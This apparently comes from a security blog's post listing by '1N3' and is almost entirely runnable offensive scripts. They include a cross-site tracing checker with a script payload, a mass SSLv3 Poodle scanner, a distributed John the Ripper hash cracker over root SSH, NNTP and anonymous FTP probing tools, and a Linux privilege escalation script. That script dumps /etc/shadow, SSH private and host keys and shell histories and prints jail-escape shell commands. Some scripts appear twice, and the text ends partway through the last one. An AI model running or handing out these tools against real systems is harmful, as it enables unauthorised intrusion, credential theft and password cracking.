Showing posts with label script. Show all posts
Showing posts with label script. Show all posts
Saturday, June 6, 2015
Saturday, February 28, 2015
Cross-Site Tracer Exploit
#!/usr/bin/python
# Cross-Site Tracer by 1N3 v20150224
# https://crowdshield.com
#
# ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, you can create a list of domains or IP addresses to iterate through by doing 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'
#
# USAGE: xsstracer.py <IP/host> <port>
#
import socket
import time
import sys, getopt
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def main(argv):
argc = len(argv)
if argc <= 2:
print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC
print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC
print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC
sys.exit(0)
target = argv[1] # SET TARGET
port = argv[2] # SET PORT
buffer1 = "TRACE / HTTP/1.1"
buffer2 = "Test: <script>alert(1);</script>"
buffer3 = "Host: " + target
print ""
print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 "
print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com"
print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result=s.connect_ex((target,int(port)))
if result == 0:
s.send(buffer1 + "\n")
s.send(buffer2 + "\n")
s.send(buffer3 + "\n\n")
data = s.recv(1024)
script = "alert"
if script.lower() in data.lower():
print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC
print ""
print bcolors.WARNING + data + bcolors.ENDC
else:
print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!"
print ""
print ""
else:
print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC
s.close()
main(sys.argv)
Friday, October 17, 2014
PoodleWalk SSLv3 Scanner
#!/bin/bash
# PoodleWalk SSLv3 Scanner v20141017 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: ./poodlewalk.sh <CIDR|IP>
#
# ABOUT:
# PoodWalk makes it easier to mass scan environments for systems vulnerable to the "Poodle" vulnerability. It uses unicorn scan to scan a large range of IP's or CIDR blocks for port 443. If open, poodwalk runs SSLScan for SSLv3 enabled ciphers which are vulnerable to the "Poodle" attack in CVE-2014-3566.
#
# REQUIREMENTS:
# Is unicornscan installed?
# Is sslscan installed?
#
# USAGE EXAMPLES:
# ./poodlewalk.sh 192.168.0.0/16 - Mass scan all hosts for port 443 and test for SSLv3 on 192.168.0.0/16
# for a in `cat my_list_of_domains_or_ips.txt`; do ./poodlewalk.sh $a; done; - Mass scan a text file of domains and IP's for Poodle
#
echo -e "\033[1m(--==== PoodleWalk SSLv3 Scanner by 1N3"
echo -e "\033[1m(--==== http://treadstonesecurity.blogspot.ca"
tput sgr0
echo ""
UNICORNSCAN=`which unicornscan`
SSLSCAN=`which sslscan`
RANGE=$1
if [ "$UNICORNSCAN" == "" ]; then
echo -e "\033[1m(--==== Unicornscan not installed! Exiting..."
exit
fi
if [ "$SSLSCAN" == "" ]; then
echo -e "\033[1m(--==== SSLScan not installed! Exiting..."
exit
fi
if [ -z "$1" ]; then
echo -e "\033[1m(--==== Usage: $0 <CIDR|IP>"
exit
fi
echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $RANGE"
for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
do
echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $a"
sslscan --no-failed $a | egrep --color=auto 'Accepted SSLv3'
done
echo -e "\033[1m(--==== Scan Complete!"
exit
# PoodleWalk SSLv3 Scanner v20141017 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: ./poodlewalk.sh <CIDR|IP>
#
# ABOUT:
# PoodWalk makes it easier to mass scan environments for systems vulnerable to the "Poodle" vulnerability. It uses unicorn scan to scan a large range of IP's or CIDR blocks for port 443. If open, poodwalk runs SSLScan for SSLv3 enabled ciphers which are vulnerable to the "Poodle" attack in CVE-2014-3566.
#
# REQUIREMENTS:
# Is unicornscan installed?
# Is sslscan installed?
#
# USAGE EXAMPLES:
# ./poodlewalk.sh 192.168.0.0/16 - Mass scan all hosts for port 443 and test for SSLv3 on 192.168.0.0/16
# for a in `cat my_list_of_domains_or_ips.txt`; do ./poodlewalk.sh $a; done; - Mass scan a text file of domains and IP's for Poodle
#
echo -e "\033[1m(--==== PoodleWalk SSLv3 Scanner by 1N3"
echo -e "\033[1m(--==== http://treadstonesecurity.blogspot.ca"
tput sgr0
echo ""
UNICORNSCAN=`which unicornscan`
SSLSCAN=`which sslscan`
RANGE=$1
if [ "$UNICORNSCAN" == "" ]; then
echo -e "\033[1m(--==== Unicornscan not installed! Exiting..."
exit
fi
if [ "$SSLSCAN" == "" ]; then
echo -e "\033[1m(--==== SSLScan not installed! Exiting..."
exit
fi
if [ -z "$1" ]; then
echo -e "\033[1m(--==== Usage: $0 <CIDR|IP>"
exit
fi
echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $RANGE"
for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
do
echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $a"
sslscan --no-failed $a | egrep --color=auto 'Accepted SSLv3'
done
echo -e "\033[1m(--==== Scan Complete!"
exit
Friday, August 22, 2014
GridCrack - A Grid Based Password Cracker
#!/bin/bash
# GRIDCRACK v20140822 by 1N3 @ http://xerosecurity.com
#
# USAGE: ./gridcrack <crack/status/setup> <format>
#
# ABOUT:
# GRIDCRACK is a Linux grid based password cracker used to leverage multiple servers to crack a single hash file.
#
# REQUIREMENTS:
# 1) Two or more Linux based servers running John The Ripper (john)
# 2) root SSH keys setup for automatic login/authentication via SSH keys
# 3) A large masterlist dictionary file to split amongst the configured nodes
#
# HOW IT WORKS:
# Running ./gridcrack setup will launch the initial setup of gridcrack which will prompt for the masterlist.dic file (a large wordlist of your choice..).
# From there, it will proceed to split the file into equal parts based on the number of configured nodes in this script (NUM_NODES). Next, It will transfer
# the individual parts of the split wordlist to each host via SCP. From here, the user can copy/paste their hashes into the hashes.txt (/pentest/gridcrack/hashes.txt)
# and run the appropriate command to begin the brute force attack (ie. ./gridcrack crack NT). From here, gridcrack will first copy the hashes.txt to each node first,
# then proceed to run john on each node simultaneously using the format specified (ie. NT). Results are then displayed back to the central server as
# each node finishes. A status mode is also included to show the status of john on each node (ie. ./gridcrack status NT).
#
#
# STATIC VARS
# FILL THIS OUT PRIOR TO RUNNING GRIDCRACK...
NUM_NODES=""
NODE1=""
NODE2=""
NODE3=""
GRIDCRACK_HOME=""
# CRACK MODE
if [ "$1" == "crack" ]
then
if [ -z "$2" ]
then
echo "Format not set. Use ./gridcrack crack <format> to set it..."
exit 1
else
FORMAT="$2"
# TRANSFER HASHES TO EACH NODE
echo "Transferring hashes to each node..."
if [ "$NODE1" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE1:$GRIDCRACK_HOME 2> /dev/null
fi
if [ "$NODE2" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE2:$GRIDCRACK_HOME 2> /dev/null
fi
if [ "$NODE3" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE3:$GRIDCRACK_HOME 2> /dev/null
fi
# START CRACKING ON EACH NODE
echo "Starting crack mode on each node..."
if [ "$NODE1" ]
then
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xaa -format=$FORMAT 2> /dev/null && ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show &
fi
if [ "$NODE2" ]
then
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xab --format=$FORMAT 2> /dev/null && ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &
fi
if [ "$NODE3" ]
then
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xac --format=$FORMAT 2> /dev/null && ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &
fi
fi
# SHOW STATUS
elif [ "$1" == "status" ]
then
if [ -z "$2" ]
then
echo "Format not set. Use ./gridcrack status <format> to set it..."
exit 1
else
FORMAT="$2"
echo "Checking status..."
if [ "$NODE1" ]
then
echo "#### NODE1:"
ssh root@$NODE1 ps -ef | grep john | grep hashes
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show
fi
if [ "$NODE2" ]
then
echo "#### NODE2:"
ssh root@$NODE2 ps -ef | grep john | grep hashes
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
fi
if [ "$NODE3" ]
then
echo "#### NODE3:"
ssh root@$NODE3 ps -ef | grep john | grep hashes
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
fi
fi
# RUN SETUP
elif [ "$1" == "setup" ]
then
echo "################"
echo "Running setup..."
echo "################"
echo ""
echo "Enter full name and path to masterlist.dic...(ie. /pentest/gridcrack/wordlists/masterlist.dic)"
read MASTERLIST
MASTERLIST_LINES=`wc -l $MASTERLIST | awk '{print $1}'`
MASTERLIST_LINES=`expr $MASTERLIST_LINES / $NUM_NODES`
cd $GRIDCRACK_HOME/wordlists/
echo "Splitting wordlists... this could take a few minutes..."
split -l $MASTERLIST_LINES $MASTERLIST
ls -lh $GRIDCRACK_HOME/wordlists/
if [ "$NODE1" ]
then
echo "Creating directory structure on $NODE1..."
ssh root@$NODE1 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xaa root@$NODE1:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
if [ "$NODE2" ]
then
ssh root@$NODE2 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xab root@$NODE2:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
if [ "$NODE3" ]
then
ssh root@$NODE3 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xac root@$NODE3:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
# SHOW HELP SCREEN
elif [ "$1" == "-h" ]
then
echo "************* GRIDCRACK by 1N3 ********************"
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
echo "************* http://xerosecurity.com *************"
else
echo "************* GRIDCRACK by 1N3 ********************"
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
echo "************* http://xerosecurity.com *************"
fi
# GRIDCRACK v20140822 by 1N3 @ http://xerosecurity.com
#
# USAGE: ./gridcrack <crack/status/setup> <format>
#
# ABOUT:
# GRIDCRACK is a Linux grid based password cracker used to leverage multiple servers to crack a single hash file.
#
# REQUIREMENTS:
# 1) Two or more Linux based servers running John The Ripper (john)
# 2) root SSH keys setup for automatic login/authentication via SSH keys
# 3) A large masterlist dictionary file to split amongst the configured nodes
#
# HOW IT WORKS:
# Running ./gridcrack setup will launch the initial setup of gridcrack which will prompt for the masterlist.dic file (a large wordlist of your choice..).
# From there, it will proceed to split the file into equal parts based on the number of configured nodes in this script (NUM_NODES). Next, It will transfer
# the individual parts of the split wordlist to each host via SCP. From here, the user can copy/paste their hashes into the hashes.txt (/pentest/gridcrack/hashes.txt)
# and run the appropriate command to begin the brute force attack (ie. ./gridcrack crack NT). From here, gridcrack will first copy the hashes.txt to each node first,
# then proceed to run john on each node simultaneously using the format specified (ie. NT). Results are then displayed back to the central server as
# each node finishes. A status mode is also included to show the status of john on each node (ie. ./gridcrack status NT).
#
#
# STATIC VARS
# FILL THIS OUT PRIOR TO RUNNING GRIDCRACK...
NUM_NODES=""
NODE1=""
NODE2=""
NODE3=""
GRIDCRACK_HOME=""
# CRACK MODE
if [ "$1" == "crack" ]
then
if [ -z "$2" ]
then
echo "Format not set. Use ./gridcrack crack <format> to set it..."
exit 1
else
FORMAT="$2"
# TRANSFER HASHES TO EACH NODE
echo "Transferring hashes to each node..."
if [ "$NODE1" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE1:$GRIDCRACK_HOME 2> /dev/null
fi
if [ "$NODE2" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE2:$GRIDCRACK_HOME 2> /dev/null
fi
if [ "$NODE3" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE3:$GRIDCRACK_HOME 2> /dev/null
fi
# START CRACKING ON EACH NODE
echo "Starting crack mode on each node..."
if [ "$NODE1" ]
then
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xaa -format=$FORMAT 2> /dev/null && ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show &
fi
if [ "$NODE2" ]
then
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xab --format=$FORMAT 2> /dev/null && ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &
fi
if [ "$NODE3" ]
then
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xac --format=$FORMAT 2> /dev/null && ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &
fi
fi
# SHOW STATUS
elif [ "$1" == "status" ]
then
if [ -z "$2" ]
then
echo "Format not set. Use ./gridcrack status <format> to set it..."
exit 1
else
FORMAT="$2"
echo "Checking status..."
if [ "$NODE1" ]
then
echo "#### NODE1:"
ssh root@$NODE1 ps -ef | grep john | grep hashes
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show
fi
if [ "$NODE2" ]
then
echo "#### NODE2:"
ssh root@$NODE2 ps -ef | grep john | grep hashes
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
fi
if [ "$NODE3" ]
then
echo "#### NODE3:"
ssh root@$NODE3 ps -ef | grep john | grep hashes
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
fi
fi
# RUN SETUP
elif [ "$1" == "setup" ]
then
echo "################"
echo "Running setup..."
echo "################"
echo ""
echo "Enter full name and path to masterlist.dic...(ie. /pentest/gridcrack/wordlists/masterlist.dic)"
read MASTERLIST
MASTERLIST_LINES=`wc -l $MASTERLIST | awk '{print $1}'`
MASTERLIST_LINES=`expr $MASTERLIST_LINES / $NUM_NODES`
cd $GRIDCRACK_HOME/wordlists/
echo "Splitting wordlists... this could take a few minutes..."
split -l $MASTERLIST_LINES $MASTERLIST
ls -lh $GRIDCRACK_HOME/wordlists/
if [ "$NODE1" ]
then
echo "Creating directory structure on $NODE1..."
ssh root@$NODE1 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xaa root@$NODE1:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
if [ "$NODE2" ]
then
ssh root@$NODE2 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xab root@$NODE2:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
if [ "$NODE3" ]
then
ssh root@$NODE3 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xac root@$NODE3:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
# SHOW HELP SCREEN
elif [ "$1" == "-h" ]
then
echo "************* GRIDCRACK by 1N3 ********************"
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
echo "************* http://xerosecurity.com *************"
else
echo "************* GRIDCRACK by 1N3 ********************"
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
echo "************* http://xerosecurity.com *************"
fi
Tuesday, August 12, 2014
Network News Transfer Protocol (NNTP) Fuzzer
#!/usr/bin/python
# Network News Transport Protocol Fuzzer by 1N3 v20140802
# http://xerosecurity.com
#
# USAGE: NTTP_fuzz.py <IP/host> <port>
#
#HELP
#100 Supported Commands
# MODE READER
# AUTHINFO USER <username>
# AUTHINFO PASS <password>
# LIST <active|newsgroups|overview.fmt> <pattern>
# XGTITLE <pattern>
# GROUP <newsgroup>
# LISTGROUP <newsgroup>
# NEWGROUPS <yy><yymmdd> <hhmmss>
# OVER <range|msgid>
# XOVER <range|msgid>
# XHDR <header> <range|msgid>
# XPAT <header> <range|msgid> <pattern> <pattern..>
# NEWNEWS <newsgroup> <yymmdd> <hhmmss> <gmt|utc>
# STAT <msgid|number>
# HEAD <msgid|number>
# BODY <msgid|number>
# ARTICLE <msgid|number>
# POST
# NEXT
# LAST
# HELP
# DATE
# QUIT
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print “usage: %s <host>” % (argv[0])
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # CREATE SOCKET
buffer = ["X"] # BUFFER “X”
counter = 100 # START VALUE
target = argv[1] # SET TARGET
port = “119″ # SET PORT
while (len(buffer)) <= 10000: # END VALUE
buffer=”X”*counter
counter=counter+100 # MULTIPLIER
print “(–==== Fuzzing ” + target + “:” + port + ” with length:” +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,int(port)))
data = s.recv(1024)
#print “CONNECTION: ” +data
s.send(‘AUTHINFO USER ‘ + buffer + ‘\r\n’)
data = s.recv(1024)
#print “received: ” +data
s.send(‘AUTHINFO PASS ‘ + buffer + ‘\r\n’)
data = s.recv(1024)
print “received: ” +data
s.close()
#time.sleep(3)
# print “\n”.join(sys.argv)
main(sys.argv)
Anonymous FTP Login Checker
#!/usr/bin/python
# Anonymous FTP login checker by 1N3 v20140805
# http://xerosecurity.com
#
# ABOUT:
# This script checks the remote host for anonymous FTP accounts enabled.
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print “usage: %s <host>” % (argv[0])
sys.exit(0)
print “(–==== Checking anonymous FTP login…\n”
users=["anonymous","admin","ftp","administrator","guest"]
target = argv[1] # SET TARGET
for user in users:
print “(–==== Checking user: ” +user
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,21))
data = s.recv(1024)
s.send(‘USER ‘ +user+ ‘\r\n’)
data = s.recv(1024)
s.send(‘PASS ‘ +user+ ‘\r\n’)
data = s.recv(1024)
print data
s.send(‘QUIT’ +’\r\n’)
s.close()
main(sys.argv)
Monday, December 23, 2013
Linux Privilege Escalation Script
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
# bmmmd'
#
echo "-[Linux Privilege Escalation Script by 1N3]=--"
echo "-[http://treadstonesecurity.blogspot.com]=--"
echo ""
echo "#>01 Whats the distribution type? What version?"
echo "#>02 What's the Kernel version? Is it 64-bit?"
echo "#>03 What can be learnt from the environmental variables?"
echo "#>04 Is there a printer?"
echo "#>05 What services are running? Which service has which user"
echo "#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!"
echo "#>07 What applications are installed? What version are they? Are they currently running?"
echo "#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?"
echo "#>09 What jobs are scheduled?"
echo "#>10 Any plain text usernames and/or passwords?"
echo "#>11 What NIC(s) does the system have? Is it connected to another network?"
echo "#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?"
echo "#>13 Whats cached? IP and/or MAC addresses"
echo "#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?"
echo "#>15 What sensitive files can be found?"
echo "#>16 Anything interesting in the home directorie(s)? If its possible to access"
echo "#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords"
echo "#>18 What has the user being doing? Is there any password in plain text? What have they been edting?"
echo "#>19 What user information can be found?"
echo "#>20 Can private-key information be found?"
echo "#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?"
echo "#>22 What can be found in /var/?"
echo "#>23 Any settings/files (hidden) on website? Any settings file with database information?"
echo "#>24 Is there anything in the log file(s) (Could help with Local File Includes!)"
echo "#>25 If commands are limited, you break out of the jail shell?"
echo "#>26 How are file-systems mounted?"
echo "#>27 Are there any unmounted file-systems?"
echo "#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here"
echo "#>29 SGID (chmod 2000) - run as the group, not the user who started it."
echo "#>30 SUID (chmod 4000) - run as the owner, not the user who started it."
echo "#>31 SGID or SUID"
echo "#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm"
echo "#>33 world-writeable folders"
echo "#>34 world-writeable & executable folders"
echo "#>35 Any problem files? Word-writeable, nobody files"
echo "#>36 world-writeable files"
echo "#>37 Noowner files"
echo "#>38 What development tools/languages are installed/supported?"
echo "#>39 How can files be uploaded?"
echo ""
echo ""
echo ""
echo "#>01 Whats the distribution type? What version?"
echo "#####################################################################"
cat /etc/issue
cat /etc/*-release
echo ""
echo "#>02 What's the Kernel version? Is it 64-bit?"
echo "#####################################################################"
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
echo ""
echo "#>03 What can be learnt from the environmental variables?"
echo "#####################################################################"
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
echo ""
echo "#>04 Is there a printer?"
echo "#####################################################################"
lpstat -a
echo ""
echo "#>05 What services are running? Which service has which user"
echo "#####################################################################"
netstat -tulnpe
ps -ef
cat /etc/service
echo ""
echo "Listing all running processes..."
ps -auxxx
echo ""
echo "#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!"
echo "#####################################################################"
ps aux | grep root
echo ""
echo "#>07 What applications are installed? What version are they? Are they currently running?"
echo "#####################################################################"
#ls -alh /usr/bin/
#ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
echo ""
echo "#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?"
echo "#####################################################################"
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
echo ""
echo "#>09 What jobs are scheduled?"
echo "#####################################################################"
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
echo ""
echo "#>10 Any plain text usernames and/or passwords?"
echo "#####################################################################"
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
echo ""
echo "#>11 What NIC(s) does the system have? Is it connected to another network?"
echo "#####################################################################"
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
echo ""
echo "#>12What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?"
echo "#####################################################################"
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
cat /etc/hosts
arp
ifconfig -a
iptables -L
hostname
dnsdomainname
echo ""
echo "What other users & hosts are communicating with the system?"
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
echo ""
echo "#>13 Whats cached? IP and/or MAC addresses"
echo "#####################################################################"
arp -e
route
/sbin/route -nee
echo ""
echo "#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?"
echo "#####################################################################"
id
who
w
last
cat /etc/passwd | cut -d: # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
echo ""
echo "#>15 What sensitive files can be found?"
echo "#####################################################################"
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
echo ""
echo "#>16 Anything interesting in the home directorie(s)? If its possible to access"
echo "#####################################################################"
ls -ahlR /root/
ls -ahlR /home/
echo ""
echo "#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords"
echo "#####################################################################"
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
egrep -i pass * -Rn /etc/
egrep -i pass * -Rn /var/www/
echo ""
echo "#>18 What has the user being doing? Is there any password in plain text? What have they been edting?"
echo "#####################################################################"
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
echo ""
echo "#>19 What user information can be found?"
echo "#####################################################################"
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
echo ""
echo "#>20 Can private-key information be found?"
echo "#####################################################################"
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
echo ""
echo "#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?"
echo "#####################################################################"
find /etc -user $USER
echo ""
echo "#>22 What can be found in /var/?"
echo "#####################################################################"
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
echo ""
echo "#>23 Any settings/files (hidden) on website? Any settings file with database information?"
echo "#####################################################################"
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
echo ""
echo "#>24 Is there anything in the log file(s) (Could help with Local File Includes!)"
echo "# http://www.thegeekstuff.com/2011/08/linux-var-log-files/"
echo "#####################################################################"
#cat /etc/httpd/logs/access_log
#cat /etc/httpd/logs/access.log
#cat /etc/httpd/logs/error_log
#cat /etc/httpd/logs/error.log
#cat /var/log/apache2/access_log
#cat /var/log/apache2/access.log
#cat /var/log/apache2/error_log
#cat /var/log/apache2/error.log
#cat /var/log/apache/access_log
#cat /var/log/apache/access.log
#cat /var/log/auth.log
#cat /var/log/chttp.log
#cat /var/log/cups/error_log
#cat /var/log/dpkg.log
#cat /var/log/faillog
#cat /var/log/httpd/access_log
#cat /var/log/httpd/access.log
#cat /var/log/httpd/error_log
#cat /var/log/httpd/error.log
#cat /var/log/lastlog
#cat /var/log/lighttpd/access.log
#cat /var/log/lighttpd/error.log
#cat /var/log/lighttpd/lighttpd.access.log
#cat /var/log/lighttpd/lighttpd.error.log
#cat /var/log/messages
#cat /var/log/secure
#cat /var/log/syslog
#cat /var/log/wtmp
#cat /var/log/xferlog
#cat /var/log/yum.log
#cat /var/run/utmp
ls -alh /var/log/*
echo ""
echo "#>25 If commands are limited, you break out of the jail shell?"
echo "#####################################################################"
echo "python -c 'import pty;pty.spawn("/bin/bash")'"
echo "echo os.system('/bin/bash')"
echo "/bin/sh -i"
echo ""
echo "#>26 How are file-systems mounted?"
echo "#####################################################################"
mount
df -h
echo ""
echo "#>27 Are there any unmounted file-systems?"
echo "#####################################################################"
cat /etc/fstab
echo ""
#echo "#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here"
#find / -perm -1000 -type d 2>/dev/null
#echo "#>29 SGID (chmod 2000) - run as the group, not the user who started it."
#find / -perm -g=s -type f 2>/dev/null
#echo "#>30 SUID (chmod 4000) - run as the owner, not the user who started it."
#find / -perm -u=s -type f 2>/dev/null
#echo "#>31 SGID or UID"
#find / -perm -g=s -o -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
#for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f -exec ls -l {} \; 2>/dev/null; done
#find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
find / -type f -exec ls -l {} \; 2> /dev/null | egrep -i "rwsr|rwxr-sr"
find / -perm +6000 -type f -exec ls -ld {} \;
#echo ""
echo "SUID OR GUID Writable files..."
echo "#####################################################################"
find / -o -group `id -g` -perm -g=w -perm -u=s \
-o -perm -o=w -perm -u=s \
-o -perm -o=w -perm -g=s \
-ls 2>/dev/null
find / -perm 02000 -o -perm -04000 2>/dev/null
echo ""
echo "#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm"
echo "#####################################################################"
mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w -o -group `id -g` -perm -g=w -o -perm -o=w \) -ls 2>/dev/null
echo ""
echo "#>33 world-writeable folders"
